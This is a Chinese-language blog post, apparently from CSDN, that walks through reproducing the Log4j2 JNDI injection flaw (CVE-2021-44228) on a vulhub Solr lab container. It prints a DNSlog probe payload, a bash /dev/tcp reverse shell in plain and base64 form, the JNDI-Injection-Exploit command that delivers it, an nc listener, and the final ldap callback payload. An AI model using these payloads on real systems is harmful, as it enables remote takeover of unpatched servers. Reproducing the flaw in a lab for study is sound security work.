首页 > 其他分享 >Apache Log4j漏洞复现

Apache Log4j漏洞复现

时间:2024-12-24 21:27:11浏览次数:5  
标签:java 漏洞 jar JNDI 复现 Apache 日志 Log4j bash

所用环境

宝塔云服务器

log4j2 是Apache的⼀个java日志框架,我们借助它进行日志相关操作管理,然而在2021年末log4j2爆出了远程代码执行漏洞,属于严重等级的漏洞。

apache log4j通过定义每⼀条日志信息的级别能够更加细致地控制日志⽣成地过程,受影响地版本中纯在JNDI注入漏洞,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行,且利用条件低,影响范围广,小到网站,大到可联网的车都受影响,建议使用了相关版本的应用或者插件,尽快升级修补,做好相关方措施,避免造成不必要的损失。

一、启动靶场容器并在浏览器中进行访问

#启动命令
cd vulhub/log4j/CVE-2021-44228
docker-compose up -d
docker ps

这里看到我们的容器端口为8983,在浏览器中访问该地址

这里我们访问成功

二、用dnslog测试注入效果

访问dnslog.cn获取一个新的链接

可以发现 /solr/admin/cores?action= 这里有个参数可以传,可以按照上面的原理 先构造⼀个请求传过去存在JNDI注入那么ldap服务端会执行我们传上去的payload然后在DNSLOG 平台上那里留下记录,我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的版本号!

/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.0ww7ad.dnslog.cn}

刷新一下便看到了java的版本号

三、开始反弹Shell

# JDNI项⽬地址
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

# 反弹shell
bash -i >& /dev/tcp/172.16.1.159/6666 0>&1
  
# 反弹Shell-base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xNTkvNjY2NiAwPiYx

# 命令模板
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,[经过base64编码后的命令]}|{base64,-d}|bash" -A [你的vpsip]
  
# 最终Payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xODYvNjk2OSAwPiYx}|{base64,-d}|{bash,-i}" -A "172.16.1.186"
  
# 备注
-C后⾯的参数是要执⾏的命令以及编码⽅式,-A后⾯就是对应ip地址。

这里已经生成了我们的恶意代码类

我们再打开一个终端来监听我们的6666端口

nc -lvvp 6666

拿取JDK1.8并构造Payload且直接访问..可以看到网页被重定向到了我们的恶意类网址...

/solr/admin/cores?action=${jndi:ldap://101.42.118.221:1389/jyvecl}

此时我们就获取了该网站的shell,我们输入ls来看看命令是否被执行

拿下!!!

标签:java,漏洞,jar,JNDI,复现,Apache,日志,Log4j,bash
From: https://blog.csdn.net/2302_80256359/article/details/144703305

相关文章

  • Vnlhun靶场Log4j2漏洞
    相关概念log4j2是Apache的⼀个java日志框架,我们借助它进行日志相关操作管理,然而在2021年末log4j2爆出了远程代码执行漏洞,属于严重等级的漏洞漏洞原理简单说就是当你使⽤log4j2中提供的⽅法去输出⽇志信息时,⽐如说最常⻅的:Stringa="变量输⼊"JNDI注入介绍JNDI,中⽂名叫j......
  • 深入解析 Apache APISIX
    以下是“第一部分:背景与概述”的示例写作内容,供你参考和使用。你可根据实际需求和篇幅进行增删或细化。一、背景与概述1.高性能动态网关的意义1.1微服务架构下的网关角色与价值随着微服务架构在企业级应用中日益普及,系统被拆分为更细粒度、相互独立的服务模块。这样......
  • 【随手记录】Apache POI 报错:Zip bomb detected! The file would exceed the max. rat
    1、背景:使用POI解析Excel报错:Zipbombdetected!Thefilewouldexceedthemax.ratioofcompressedfilesizetothesizeoftheexpandeddata。Thismayindicatethatthefileisusedtoinflatememoryusageandthiscouldposeasecurityrisk.Youcanadj......
  • 楚慧杯Misc—复现
    gza_CrackerCrack_me追踪tcp流量找到字典保存字典,上流量一把梭base64解密特殊流量2一把梭出个www.zip打开,是个RSA<?php$cmd=@$_POST['ant'];$pk=<<<EOF-----BEGINPUBLICKEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCfhiyoPdM6svJZ+QlYywklwVcxPkExXQD......
  • Apache解析漏洞(apache_parsing&CVE-2017-15715)
    apache_parsing到浏览器中访问网站http://8.155.8.239:81/我们写一个木马1.php.jpg我们将写好的木马上传会得到我们上传文件的路径我们访问一下发现上传成功发现木马运行成功,接下来使用蚁剑连接我们的图片马获取shell成功CVE-2013-454我们还是到浏览器中......
  • Linux —— 搭建Apache服务器
    一、基本概念定义Apache服务器(全称ApacheHTTPServer)是一款开源的、跨平台的Web服务器软件。它通过HTTP协议提供网页服务,能够将存储在服务器上的网页文件(如HTML文件、图片、脚本等)发送给客户端(如浏览器)。工作原理当客户端(例如浏览器)向服务器请求一个网页时,Apache......
  • Linux 中检查 Apache Web Server (httpd) 正常运行时间的 4 种方法
    注:机翻,未校。4WaysToCheckUptimeofApacheWebServer(httpd)onLinuxNovember28,2019byMageshMaruthamuthuWeallknowaboutthepurposeofuptimecommandinLinux.我们都知道Linux中uptime命令的目的。ItisusedtochecktheuptimeoftheL......
  • 【漏洞复现】CVE-2022-45206 & CVE-2023-38905 SQL Injection
    漏洞信息NVD-CVE-2022-45206Jeecg-bootv3.4.3wasdiscoveredtocontainaSQLinjectionvulnerabilityviathecomponent/sys/duplicate/check.NVD-CVE-2023-38905SQLinjectionvulnerabilityinJeecg-bootv.3.5.0andbeforeallowsalocalattackerto......
  • 复现MSG:Multiview Scene Graph (NeurIPS 2024)需要的工程知识
    复现项目需要的步骤指南涵盖了环境搭建、数据集准备、模型推理和训练的流程:1.克隆项目代码首先从官方仓库克隆代码:gitclonehttps://github.com/ai4ce/MSG.gitcdMSG2.配置运行环境项目提供了两种方式来设置运行环境,推荐使用environment.yml方法,以确保完整的环境依......
  • 方正畅享全媒体采编系统reportCenter.do接口SQL注入漏洞复现 [附POC]
    文章目录方正畅享全媒体采编系统reportCenter.do接口SQL注入漏洞复现[附POC]0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.构造POC3.复现方正畅享全媒体采编系统reportCenter.do接口SQL注入漏洞复现[附POC]0x......